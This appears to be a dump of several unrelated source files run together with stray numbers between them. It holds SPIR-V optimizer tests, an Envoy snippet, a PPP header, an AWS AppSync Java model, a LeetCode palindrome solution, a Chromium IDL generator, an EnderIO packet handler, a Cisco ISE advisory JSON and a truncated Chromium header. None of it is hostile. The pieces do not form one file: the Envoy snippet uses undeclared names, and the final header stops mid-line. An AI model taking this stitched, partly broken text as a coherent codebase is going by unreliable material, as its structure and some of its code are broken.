%phi = OpPhi %5 %add1 %13 %add2 %14 ; CHECK-NOT: OpFAdd %16 = OpFAdd %5 %11 %11 OpReturn OpFunctionEnd )"; SinglePassRunAndMatch<RedundancyEliminationPass>(text, false); } // Keep the add because it is redundant on some paths, but not all paths. 
TEST_F(RedundancyEliminationTest, KeepPartiallyRedundantAdd) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %7 = OpTypeBool %8 = OpConstantTrue %7 %2 = OpFunction %3 None %4 %9 = OpLabel %10 = OpVariable %6 Function %11 = OpLoad %5 %10 OpBranchConditional %8 %13 %14 %13 = OpLabel %add = OpFAdd %5 %11 %11 OpBranch %15 %14 = OpLabel OpBranch %15 %15 = OpLabel %16 = OpFAdd %5 %11 %11 OpReturn OpFunctionEnd )"; auto result = SinglePassRunAndDisassemble<RedundancyEliminationPass>( text, /* skip_nop = */ true, /* do_validation = */ false); EXPECT_EQ(Pass::Status::SuccessWithoutChange, std::get<1>(result)); } // Keep the add. Even if it is redundant on all paths, there is no single id // whose definition dominates the add and contains the same value. TEST_F(RedundancyEliminationTest, KeepRedundantAddWithoutPhi) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %7 = OpTypeBool %8 = OpConstantTrue %7 %2 = OpFunction %3 None %4 %9 = OpLabel %10 = OpVariable %6 Function %11 = OpLoad %5 %10 OpBranchConditional %8 %13 %14 %13 = OpLabel %add1 = OpFAdd %5 %11 %11 OpBranch %15 %14 = OpLabel %add2 = OpFAdd %5 %11 %11 OpBranch %15 %15 = OpLabel %16 = OpFAdd %5 %11 %11 OpReturn OpFunctionEnd )"; auto result = SinglePassRunAndDisassemble<RedundancyEliminationPass>( text, /* skip_nop = */ true, /* do_validation = */ false); EXPECT_EQ(Pass::Status::SuccessWithoutChange, std::get<1>(result)); } // Test that it can get a simple case of local redundancy elimination // when it has OpenCL.DebugInfo.100 
instructions. TEST_F(RedundancyEliminationTest, OpenCLDebugInfo100) { // When three redundant DebugValues exist, only one DebugValue must remain. const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "OpenCL.DebugInfo.100" %2 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %3 "main" OpExecutionMode %3 OriginUpperLeft OpSource GLSL 430 %4 = OpString "ps.hlsl" %5 = OpString "float" %6 = OpString "s0" %7 = OpString "main" %void = OpTypeVoid %9 = OpTypeFunction %void %float = OpTypeFloat 32 %uint = OpTypeInt 32 0 %uint_0 = OpConstant %uint 0 %uint_32 = OpConstant %uint 32 %_ptr_Function_float = OpTypePointer Function %float %15 = OpExtInst %void %1 DebugExpression %16 = OpExtInst %void %1 DebugSource %4 %17 = OpExtInst %void %1 DebugCompilationUnit 1 4 %16 HLSL %18 = OpExtInst %void %1 DebugTypeBasic %5 %uint_32 Float %19 = OpExtInst %void %1 DebugTypeVector %18 4 %20 = OpExtInst %void %1 DebugTypeFunction FlagIsProtected|FlagIsPrivate %19 %21 = OpExtInst %void %1 DebugFunction %7 %20 %16 4 1 %17 %7 FlagIsProtected|FlagIsPrivate 4 %3 ; CHECK: [[dbg_local_var:%\w+]] = OpExtInst %void {{%\w+}} DebugLocalVariable %22 = OpExtInst %void %1 DebugLocalVariable %6 %19 %16 0 0 %21 FlagIsLocal %14 = OpExtInst %void %1 DebugLocalVariable %6 %19 %16 0 0 %21 FlagIsLocal %3 = OpFunction %void None %9 %23 = OpLabel %24 = OpExtInst %void %1 DebugScope %21 %25 = OpVariable %_ptr_Function_float Function %26 = OpLoad %float %25 OpLine %4 0 0 ; Two `OpFAdd %float %26 %26` are the same. One must be removed. ; After removing one `OpFAdd %float %26 %26`, two DebugValues are the same. ; One must be removed. 
; ; CHECK: OpLine {{%\w+}} 0 0 ; CHECK-NEXT: [[add:%\w+]] = OpFAdd %float [[value:%\w+]] ; CHECK-NEXT: DebugValue [[dbg_local_var]] [[add]] ; CHECK-NEXT: OpLine {{%\w+}} 1 0 ; CHECK-NEXT: OpFAdd %float [[add]] [[value]] ; CHECK-NEXT: OpReturn %27 = OpFAdd %float %26 %26 %28 = OpExtInst %void %1 DebugValue %22 %27 %15 %uint_0 OpLine %4 1 0 %29 = OpFAdd %float %26 %26 %30 = OpExtInst %void %1 DebugValue %14 %29 %15 %uint_0 %31 = OpExtInst %void %1 DebugValue %22 %29 %15 %uint_0 %32 = OpFAdd %float %29 %26 %33 = OpFAdd %float %27 %26 OpReturn OpFunctionEnd )"; SinglePassRunAndMatch<RedundancyEliminationPass>(text, false); } TEST_F(RedundancyEliminationTest, FunctionDeclaration) { // Make sure the pass works with a function declaration that is called. const std::string text = R"(OpCapability Addresses OpCapability Linkage OpCapability Kernel OpCapability Int8 %1 = OpExtInstImport "OpenCL.std" OpMemoryModel Physical64 OpenCL OpEntryPoint Kernel %2 "_Z23julia__1166_kernel_77094Bool" OpExecutionMode %2 ContractionOff OpSource Unknown 0 OpDecorate %3 LinkageAttributes "julia_error_7712" Import %void = OpTypeVoid %5 = OpTypeFunction %void %3 = OpFunction %void None %5 OpFunctionEnd %2 = OpFunction %void None %5 %6 = OpLabel %7 = OpFunctionCall %void %3 OpReturn OpFunctionEnd )"; SinglePassRunAndCheck<RedundancyEliminationPass>(text, text, false); } } // namespace } // namespace opt } // namespace spvtools
5,959
17,703
namespace Envoy {

// Directly calling waitFor on a condvar no good; need to inject TimeSystem.
// NOTE(review): `condvar`, `mutex`, and `duration` are free names here — they
// must be declared elsewhere in this file/translation unit; confirm their
// types before relying on this snippet. The int return presumably encodes the
// condvar wait outcome (e.g. timed-out vs signaled) — verify against the
// CondVar API actually in scope.
int waiting() { return condvar.waitFor(mutex, duration); }

}  // namespace Envoy
55
1,178
/* net/ppp_defs.h — userspace shim that re-exports the kernel's PPP
 * definitions from <linux/ppp_defs.h>. */
#ifndef _NET_PPP_DEFS_H
#define _NET_PPP_DEFS_H 1

/* Glibc convention: request only the time_t definition from <time.h>
 * instead of pulling in the whole header. */
#define __need_time_t
#include <time.h>

/* Kernel fixed-width integer types (__u8, __u32, ...) that
 * <linux/ppp_defs.h> depends on. */
#include <asm/types.h>
#include <linux/ppp_defs.h>

#endif /* net/ppp_defs.h */
87
3,372
/* * Copyright 2016-2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.appsync.model; import java.io.Serializable; import javax.annotation.Generated; import com.amazonaws.protocol.StructuredPojo; import com.amazonaws.protocol.ProtocolMarshaller; /** * <p> * A <code>LambdaAuthorizerConfig</code> holds configuration on how to authorize AppSync API access when using the * <code>AWS_LAMBDA</code> authorizer mode. Be aware that an AppSync API may have only one Lambda authorizer configured * at a time. * </p> * * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/appsync-2017-07-25/LambdaAuthorizerConfig" target="_top">AWS API * Documentation</a> */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class LambdaAuthorizerConfig implements Serializable, Cloneable, StructuredPojo { /** * <p> * The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. A value of 0 disables * caching of responses. * </p> */ private Integer authorizerResultTtlInSeconds; /** * <p> * The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a version ARN ( * <code>.../v3</code>) or alias ARN. * </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. When configuring * Lambda authorizers in the Console, this is done for you. 
To do so with the Amazon Web Services CLI, run the * following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> * </p> */ private String authorizerUri; /** * <p> * A regular expression for validation of tokens before the Lambda function is called. * </p> */ private String identityValidationExpression; /** * <p> * The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. A value of 0 disables * caching of responses. * </p> * * @param authorizerResultTtlInSeconds * The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. A value of 0 * disables caching of responses. */ public void setAuthorizerResultTtlInSeconds(Integer authorizerResultTtlInSeconds) { this.authorizerResultTtlInSeconds = authorizerResultTtlInSeconds; } /** * <p> * The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. A value of 0 disables * caching of responses. * </p> * * @return The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. A value of 0 * disables caching of responses. */ public Integer getAuthorizerResultTtlInSeconds() { return this.authorizerResultTtlInSeconds; } /** * <p> * The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. 
A value of 0 disables * caching of responses. * </p> * * @param authorizerResultTtlInSeconds * The number of seconds a response should be cached for. The default is 5 minutes (300 seconds). The Lambda * function can override this by returning a <code>ttlOverride</code> key in its response. A value of 0 * disables caching of responses. * @return Returns a reference to this object so that method calls can be chained together. */ public LambdaAuthorizerConfig withAuthorizerResultTtlInSeconds(Integer authorizerResultTtlInSeconds) { setAuthorizerResultTtlInSeconds(authorizerResultTtlInSeconds); return this; } /** * <p> * The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a version ARN ( * <code>.../v3</code>) or alias ARN. * </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. When configuring * Lambda authorizers in the Console, this is done for you. To do so with the Amazon Web Services CLI, run the * following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> * </p> * * @param authorizerUri * The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a * version ARN (<code>.../v3</code>) or alias ARN. </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. When * configuring Lambda authorizers in the Console, this is done for you. 
To do so with the Amazon Web Services * CLI, run the following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> */ public void setAuthorizerUri(String authorizerUri) { this.authorizerUri = authorizerUri; } /** * <p> * The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a version ARN ( * <code>.../v3</code>) or alias ARN. * </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. When configuring * Lambda authorizers in the Console, this is done for you. To do so with the Amazon Web Services CLI, run the * following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> * </p> * * @return The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a * version ARN (<code>.../v3</code>) or alias ARN. </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. When * configuring Lambda authorizers in the Console, this is done for you. To do so with the Amazon Web * Services CLI, run the following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> */ public String getAuthorizerUri() { return this.authorizerUri; } /** * <p> * The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a version ARN ( * <code>.../v3</code>) or alias ARN. * </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. 
When configuring * Lambda authorizers in the Console, this is done for you. To do so with the Amazon Web Services CLI, run the * following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> * </p> * * @param authorizerUri * The ARN of the Lambda function to be called for authorization. This may be a standard Lambda ARN, a * version ARN (<code>.../v3</code>) or alias ARN. </p> * <p> * <i>Note</i>: This Lambda function must have the following resource-based policy assigned to it. When * configuring Lambda authorizers in the Console, this is done for you. To do so with the Amazon Web Services * CLI, run the following: * </p> * <p> * <code>aws lambda add-permission --function-name "arn:aws:lambda:us-east-2:111122223333:function:my-function" --statement-id "appsync" --principal appsync.amazonaws.com --action lambda:InvokeFunction</code> * @return Returns a reference to this object so that method calls can be chained together. */ public LambdaAuthorizerConfig withAuthorizerUri(String authorizerUri) { setAuthorizerUri(authorizerUri); return this; } /** * <p> * A regular expression for validation of tokens before the Lambda function is called. * </p> * * @param identityValidationExpression * A regular expression for validation of tokens before the Lambda function is called. */ public void setIdentityValidationExpression(String identityValidationExpression) { this.identityValidationExpression = identityValidationExpression; } /** * <p> * A regular expression for validation of tokens before the Lambda function is called. * </p> * * @return A regular expression for validation of tokens before the Lambda function is called. 
*/ public String getIdentityValidationExpression() { return this.identityValidationExpression; } /** * <p> * A regular expression for validation of tokens before the Lambda function is called. * </p> * * @param identityValidationExpression * A regular expression for validation of tokens before the Lambda function is called. * @return Returns a reference to this object so that method calls can be chained together. */ public LambdaAuthorizerConfig withIdentityValidationExpression(String identityValidationExpression) { setIdentityValidationExpression(identityValidationExpression); return this; } /** * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be * redacted from this string using a placeholder value. * * @return A string representation of this object. * * @see java.lang.Object#toString() */ @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("{"); if (getAuthorizerResultTtlInSeconds() != null) sb.append("AuthorizerResultTtlInSeconds: ").append(getAuthorizerResultTtlInSeconds()).append(","); if (getAuthorizerUri() != null) sb.append("AuthorizerUri: ").append(getAuthorizerUri()).append(","); if (getIdentityValidationExpression() != null) sb.append("IdentityValidationExpression: ").append(getIdentityValidationExpression()); sb.append("}"); return sb.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (obj instanceof LambdaAuthorizerConfig == false) return false; LambdaAuthorizerConfig other = (LambdaAuthorizerConfig) obj; if (other.getAuthorizerResultTtlInSeconds() == null ^ this.getAuthorizerResultTtlInSeconds() == null) return false; if (other.getAuthorizerResultTtlInSeconds() != null && other.getAuthorizerResultTtlInSeconds().equals(this.getAuthorizerResultTtlInSeconds()) == false) return false; if (other.getAuthorizerUri() == null ^ this.getAuthorizerUri() == null) return false; if 
(other.getAuthorizerUri() != null && other.getAuthorizerUri().equals(this.getAuthorizerUri()) == false) return false; if (other.getIdentityValidationExpression() == null ^ this.getIdentityValidationExpression() == null) return false; if (other.getIdentityValidationExpression() != null && other.getIdentityValidationExpression().equals(this.getIdentityValidationExpression()) == false) return false; return true; } @Override public int hashCode() { final int prime = 31; int hashCode = 1; hashCode = prime * hashCode + ((getAuthorizerResultTtlInSeconds() == null) ? 0 : getAuthorizerResultTtlInSeconds().hashCode()); hashCode = prime * hashCode + ((getAuthorizerUri() == null) ? 0 : getAuthorizerUri().hashCode()); hashCode = prime * hashCode + ((getIdentityValidationExpression() == null) ? 0 : getIdentityValidationExpression().hashCode()); return hashCode; } @Override public LambdaAuthorizerConfig clone() { try { return (LambdaAuthorizerConfig) super.clone(); } catch (CloneNotSupportedException e) { throw new IllegalStateException("Got a CloneNotSupportedException from Object.clone() " + "even though we're Cloneable!", e); } } @com.amazonaws.annotation.SdkInternalApi @Override public void marshall(ProtocolMarshaller protocolMarshaller) { com.amazonaws.services.appsync.model.transform.LambdaAuthorizerConfigMarshaller.getInstance().marshall(this, protocolMarshaller); } }
5,298
3,269
# Time:  O(n)
# Space: O(1)


class Solution(object):
    def nextPalindrome(self, num):
        """Return the smallest palindrome strictly greater than ``num`` using
        the same digits, or "" if no such palindrome exists.

        ``num`` is assumed to already be a palindrome (LeetCode 1842), so only
        its first half is advanced and then mirrored onto the second half.

        :type num: str
        :rtype: str
        """
        # Fix: the original used Python-2-only `xrange`, which raises
        # NameError on Python 3; `range` iterates identically here.
        def next_permutation(nums, begin, end):
            # Rearrange nums[begin:end] in place into its next lexicographic
            # permutation. Returns False (leaving the range reversed, i.e.
            # sorted ascending) when it is already the largest permutation.
            def reverse(nums, begin, end):
                left, right = begin, end - 1
                while left < right:
                    nums[left], nums[right] = nums[right], nums[left]
                    left += 1
                    right -= 1

            k, l = begin - 1, begin
            # Pivot: rightmost index k with nums[k] < nums[k+1].
            for i in reversed(range(begin, end - 1)):
                if nums[i] < nums[i + 1]:
                    k = i
                    break
            else:  # already the last permutation
                reverse(nums, begin, end)
                return False
            # Successor: rightmost index l with nums[l] > nums[k]; swap, then
            # reverse the suffix so it becomes the smallest possible tail.
            for i in reversed(range(k + 1, end)):
                if nums[i] > nums[k]:
                    l = i
                    break
            nums[k], nums[l] = nums[l], nums[k]
            reverse(nums, k + 1, end)
            return True

        nums = list(num)
        # Advance only the first half; if it is already maximal there is no
        # larger palindrome with the same digits.
        if not next_permutation(nums, 0, len(nums) // 2):
            return ""
        # Mirror the new first half onto the second half. A middle digit in
        # odd-length input is left untouched.
        for i in range(len(nums) // 2):
            nums[-1 - i] = nums[i]
        return "".join(nums)
771
2,151
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Generator registry and driver for the PPAPI IDL toolchain.

Generators register themselves by instantiation (the Generator constructor
appends `self` to GeneratorList); Generator.Run then invokes every generator
that was enabled on the command line.  NOTE: this module is Python 2 only
(print statements).
"""

import sys

from idl_log import ErrOut, InfoOut, WarnOut
from idl_option import GetOption, Option, ParseOptions
from idl_parser import ParseFiles

# Global registry of instantiated generators; populated by Generator.__init__.
GeneratorList = []

Option('out', 'List of output files', default='')
Option('release', 'Which release to generate.', default='')
Option('range', 'Which ranges in the form of MIN,MAX.', default='start,end')


class Generator(object):
  """Base class for generators.

  This class provides a mechanism for adding new generator objects to the
  IDL driver.  To use this class override the GenerateRelease and
  GenerateRange members, and instantiate one copy of the class in the same
  module which defines it to register the generator.  After the AST is
  generated, call the static Run member which will check every registered
  generator to see which ones have been enabled through command-line options.

  To enable a generator use the switches:
    --<sname> : To enable with defaults
    --<sname>_opt=<XXX,YYY=y> : To enable with generator specific options.

  NOTE: Generators still have access to global options
  """

  def __init__(self, name, sname, desc):
    # name:  human-readable generator name used in log/error messages.
    # sname: switch name; registers --<sname> and --<sname>_opt options.
    self.name = name
    self.run_switch = Option(sname, desc)
    self.opt_switch = Option(sname + '_opt', 'Options for %s.' % sname,
                             default='')
    # Registration happens as a constructor side effect.
    GeneratorList.append(self)
    self.errors = 0
    self.skip_list = []

  def Error(self, msg):
    # Log and count an error; Generate() returns the accumulated count.
    ErrOut.Log('Error %s : %s' % (self.name, msg))
    self.errors += 1

  def GetRunOptions(self):
    """Return a dict of generator options, {} if enabled without options,
    or None if this generator was not enabled on the command line."""
    options = {}
    option_list = self.opt_switch.Get()
    if option_list:
      # Parse comma-separated KEY=VALUE pairs; bare keys map to True.
      option_list = option_list.split(',')
      for opt in option_list:
        offs = opt.find('=')
        if offs > 0:
          options[opt[:offs]] = opt[offs+1:]
        else:
          options[opt] = True
      return options
    if self.run_switch.Get():
      return options
    return None

  def Generate(self, ast, options):
    """Dispatch to GenerateRange or GenerateRelease based on the global
    --range / --release options; returns the number of errors."""
    self.errors = 0

    rangestr = GetOption('range')
    releasestr = GetOption('release')

    print "Found releases: %s" % ast.releases

    # Generate list of files to ignore due to errors
    for filenode in ast.GetListOf('File'):
      # If this file has errors, skip it
      if filenode.GetProperty('ERRORS') > 0:
        self.skip_list.append(filenode)
        continue

    # Check for a range option which over-rides a release option
    if not releasestr and rangestr:
      range_list = rangestr.split(',')
      if len(range_list) != 2:
        self.Error('Failed to generate for %s, incorrect range: "%s"' %
                   (self.name, rangestr))
      else:
        vmin = range_list[0]
        vmax = range_list[1]

        # Generate 'start' and 'end' represent first and last found.
        if vmin == 'start':
          vmin = ast.releases[0]
        if vmax == 'end':
          vmax = ast.releases[-1]

        # Convert release names to indices to slice the inclusive range.
        vmin = ast.releases.index(vmin)
        vmax = ast.releases.index(vmax) + 1
        releases = ast.releases[vmin:vmax]
        InfoOut.Log('Generate range %s of %s.' % (rangestr, self.name))
        ret = self.GenerateRange(ast, releases, options)
        if ret < 0:
          self.Error('Failed to generate range %s : %s.' % (vmin, vmax))
        else:
          InfoOut.Log('%s wrote %d files.' % (self.name, ret))
    # Otherwise this should be a single release generation
    else:
      if releasestr == 'start':
        releasestr = ast.releases[0]
      if releasestr == 'end':
        releasestr = ast.releases[-1]

      # NOTE(review): this is a lexicographic string comparison of release
      # names; it presumably relies on the release naming scheme sorting
      # correctly (e.g. M14 < M16) -- confirm.
      if releasestr > ast.releases[-1]:
        InfoOut.Log('There is no unique release for %s, using last release.'
                    % releasestr)
        releasestr = ast.releases[-1]

      if releasestr not in ast.releases:
        self.Error('Release %s not in [%s].' %
                   (releasestr, ', '.join(ast.releases)))

      if releasestr:
        InfoOut.Log('Generate release %s of %s.' % (releasestr, self.name))
        ret = self.GenerateRelease(ast, releasestr, options)
        if ret < 0:
          self.Error('Failed to generate release %s.' % releasestr)
        else:
          InfoOut.Log('%s wrote %d files.' % (self.name, ret))
      else:
        self.Error('No range or release specified for %s.' % releasestr)
    return self.errors

  def GenerateRelease(self, ast, release, options):
    # Default stub: subclasses must override; calling it is an error.
    __pychecker__ = 'unusednames=ast,release,options'
    self.Error("Undefined release generator.")
    return 0

  def GenerateRange(self, ast, releases, options):
    # Default stub: subclasses must override; calling it is an error.
    __pychecker__ = 'unusednames=ast,releases,options'
    self.Error("Undefined range generator.")
    return 0

  @staticmethod
  def Run(ast):
    """Run every enabled registered generator; returns the failure count."""
    fail_count = 0

    # Check all registered generators if they should run.
    for gen in GeneratorList:
      options = gen.GetRunOptions()
      if options is not None:
        if gen.Generate(ast, options):
          fail_count += 1
    return fail_count


class GeneratorByFile(Generator):
  """A simplified generator that generates one output file per IDL source
  file.

  A subclass of Generator for use of generators which have a one to one
  mapping between IDL sources and output files.

  Derived classes should define GenerateFile.
  """

  def GenerateFile(self, filenode, releases, options):
    """Generates an output file from the IDL source.

    Returns true if the generated file is different than the previously
    generated file.
    """
    __pychecker__ = 'unusednames=filenode,releases,options'
    self.Error("Undefined release generator.")
    return 0

  def GenerateRelease(self, ast, release, options):
    # A single release is just a one-element range.
    return self.GenerateRange(ast, [release], options)

  def GenerateRange(self, ast, releases, options):
    # Get list of out files
    outlist = GetOption('out')
    if outlist:
      outlist = outlist.split(',')

    # NOTE(review): `skipList` is never appended to in this method (error
    # files are filtered via self.skip_list above), so the reporting loop
    # below looks like dead code -- confirm intent.
    skipList = []
    cnt = 0
    for filenode in ast.GetListOf('File'):
      # Ignore files with errors
      if filenode in self.skip_list:
        continue

      # Skip this file if not required
      if outlist and filenode.GetName() not in outlist:
        continue

      # Create the output file and increment out count if there was a delta
      if self.GenerateFile(filenode, releases, options):
        cnt = cnt + 1

    for filenode in skipList:
      errcnt = filenode.GetProperty('ERRORS')
      ErrOut.Log('%s : Skipped because of %d errors.' % (
          filenode.GetName(), errcnt))

    if skipList:
      return -len(skipList)

    # NOTE(review): the 'diff' option is not declared in this module;
    # presumably registered elsewhere in the toolchain.
    if GetOption('diff'):
      return -cnt
    return cnt


# Module-level flags used by the self-test generator below.
check_release = 0
check_range = 0


class GeneratorReleaseTest(Generator):
  # Self-test generator exercised by Test(); records whether the expected
  # entry point was invoked with the expected options.
  def GenerateRelease(self, ast, release, options = {}):
    __pychecker__ = 'unusednames=ast,release,options'
    global check_release
    check_map = {
      'so_long': True,
      'MyOpt': 'XYZ',
      'goodbye': True
    }
    check_release = 1
    for item in check_map:
      check_item = check_map[item]
      option_item = options.get(item, None)
      if check_item != option_item:
        print 'Option %s is %s, expecting %s' % (item, option_item, check_item)
        check_release = 0
    if release != 'M14':
      check_release = 0
    return check_release == 1

  def GenerateRange(self, ast, releases, options):
    __pychecker__ = 'unusednames=ast,releases,options'
    global check_range
    check_range = 1
    return True


def Test():
  """Self-test entry point: runs the test generator in release and range
  modes and verifies the expected path was taken.  Returns 0 on pass."""
  __pychecker__ = 'unusednames=args'
  global check_release
  global check_range

  ParseOptions(['--testgen_opt=so_long,MyOpt=XYZ,goodbye'])
  if Generator.Run('AST') != 0:
    print 'Generate release: Failed.\n'
    return -1

  if check_release != 1 or check_range != 0:
    print 'Gererate release: Failed to run.\n'
    return -1

  check_release = 0
  ParseOptions(['--testgen_opt="HELLO"', '--range=M14,M16'])
  if Generator.Run('AST') != 0:
    print 'Generate range: Failed.\n'
    return -1

  if check_release != 0 or check_range != 1:
    print 'Gererate range: Failed to run.\n'
    return -1

  print 'Generator test: Pass'
  return 0


def Main(args):
  # With no arguments run the built-in self test; otherwise parse the given
  # IDL files and run all enabled generators over the resulting AST.
  if not args:
    return Test()
  filenames = ParseOptions(args)
  ast = ParseFiles(filenames)
  return Generator.Run(ast)


if __name__ == '__main__':
  GeneratorReleaseTest('Test Gen', 'testgen', 'Generator Class Test.')
  sys.exit(Main(sys.argv[1:]))
3,257
721
package crazypants.enderio.machines.machine.teleport.packet; import com.enderio.core.common.util.NullHelper; import crazypants.enderio.api.teleport.IItemOfTravel; import io.netty.buffer.ByteBuf; import net.minecraft.entity.player.EntityPlayer; import net.minecraft.item.ItemStack; import net.minecraft.util.EnumHand; import net.minecraftforge.fml.common.network.simpleimpl.IMessage; import net.minecraftforge.fml.common.network.simpleimpl.IMessageHandler; import net.minecraftforge.fml.common.network.simpleimpl.MessageContext; public class PacketDrainStaff implements IMessage { int powerUse; int hand; public PacketDrainStaff() { } public PacketDrainStaff(int powerUse, EnumHand hand) { this.powerUse = powerUse; this.hand = hand.ordinal(); } @Override public void toBytes(ByteBuf buf) { buf.writeInt(powerUse); buf.writeInt(hand); } @Override public void fromBytes(ByteBuf buffer) { powerUse = buffer.readInt(); hand = buffer.readInt(); } public static class Handler implements IMessageHandler<PacketDrainStaff, IMessage> { @Override public IMessage onMessage(PacketDrainStaff message, MessageContext ctx) { EntityPlayer ep = ctx.getServerHandler().player; EnumHand theHand = NullHelper.notnullJ(EnumHand.values()[message.hand], "EnumHand value is null!"); ItemStack heldItemMainhand = ep.getHeldItem(theHand); if (message.powerUse > 0 && !heldItemMainhand.isEmpty() && heldItemMainhand.getItem() instanceof IItemOfTravel) { ItemStack item = heldItemMainhand.copy(); ((IItemOfTravel) item.getItem()).extractInternal(item, message.powerUse); ep.setHeldItem(theHand, item); } return null; } } }
604
892
<reponame>github/advisory-database<filename>advisories/unreviewed/2022/05/GHSA-jj77-9jr7-4mpq/GHSA-jj77-9jr7-4mpq.json { "schema_version": "1.2.0", "id": "GHSA-jj77-9jr7-4mpq", "modified": "2022-05-13T01:35:41Z", "published": "2022-05-13T01:35:41Z", "aliases": [ "CVE-2018-0187" ], "details": "A vulnerability in the Admin portal of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to obtain confidential information for privileged accounts. The vulnerability is due to the improper handling of confidential information. An attacker could exploit this vulnerability by logging into the web interface on a vulnerable system. An exploit could allow an attacker to obtain confidential information for privileged accounts. This information could then be used to impersonate or negatively impact the privileged account on the affected system.", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "affected": [ ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0187" }, { "type": "WEB", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-ise-info-disclosure" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106717" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "severity": "MODERATE", "github_reviewed": false } }
598
575
// Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef COMPONENTS_CLOUD_DEVICES_COMMON_CLOUD_DEVICE_DESCRIPTION_H_ #define COMPONENTS_CLOUD_DEVICES_COMMON_CLOUD_DEVICE_DESCRIPTION_H_ #include <memory> #include <string> #include <vector> #include "base/macros.h" #include "base/strings/string_piece_forward.h" #include "base/values.h" namespace cloud_devices { // Provides parsing, serialization and validation Cloud Device Description or // Cloud Job Ticket. // https://developers.google.com/cloud-print/docs/cdd class CloudDeviceDescription { public: CloudDeviceDescription(); ~CloudDeviceDescription(); bool InitFromString(const std::string& json); bool InitFromValue(base::Value value); static bool IsValidTicket(const base::Value& value); std::string ToString() const; base::Value ToValue() &&; // Returns item of given type with capability/option. // Returns nullptr if missing. const base::Value* GetItem(const std::vector<base::StringPiece>& path, base::Value::Type type) const; // Creates item with given type for capability/option. // Returns nullptr if an intermediate Value in the path is not a dictionary. base::Value* CreateItem(const std::vector<base::StringPiece>& path, base::Value::Type type); private: base::Value root_; DISALLOW_COPY_AND_ASSIGN(CloudDeviceDescription); }; } // namespace cloud_devices #endif // 